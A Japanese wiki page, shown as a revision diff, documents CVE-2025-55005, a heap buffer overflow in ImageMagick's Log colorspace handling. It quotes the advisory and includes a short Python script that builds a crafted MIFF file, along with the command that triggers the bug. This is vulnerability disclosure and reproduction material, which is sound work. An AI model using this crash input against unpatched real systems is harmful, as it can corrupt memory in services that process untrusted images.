YoyaWiki

• 追加された行はこの色です。
• 削除された行はこの色です。
• CVE-2025-55005 へ行く。
• CVE-2025-55005 の差分を削除

#author("2025-08-13T16:35:57+00:00","default:yoya","yoya")
#author("2025-08-28T04:20:48+00:00","default:yoya","yoya")
[[CVE/ImageMagick]]

- https://www.cve.org/CVERecord?id=CVE-2025-55005

 Title: ImageMagick: heap-buffer overflow in log colorspace handling

>
ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, when preparing to transform from Log to sRGB colorspaces, the logmap construction fails to handle cases where the reference-black or reference-white value is larger than 1024. This leads to corrupting memory beyond the end of the allocated logmap buffer. This issue has been patched in version 7.1.2-1.

- https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v393-38qx-v8fp

- generate_testcase.py
 # Create a minimal 1x1 Log MIFF file with a large reference-black property
 
 miff = f"""id=ImageMagick
 class=DirectClass
 colorspace=Log
 columns=1
 rows=1
 reference-black=1025
 \x0c\x00\x00\x00\x00\x00\x00""".encode('ascii')
 
 with open("miff_black.miff", "wb") as tmp:
     tmp.write(miff)

 python3 ./generate_testcase.py
 utilities/magick ./miff_black.miff -resize 200x200 PNG:output.png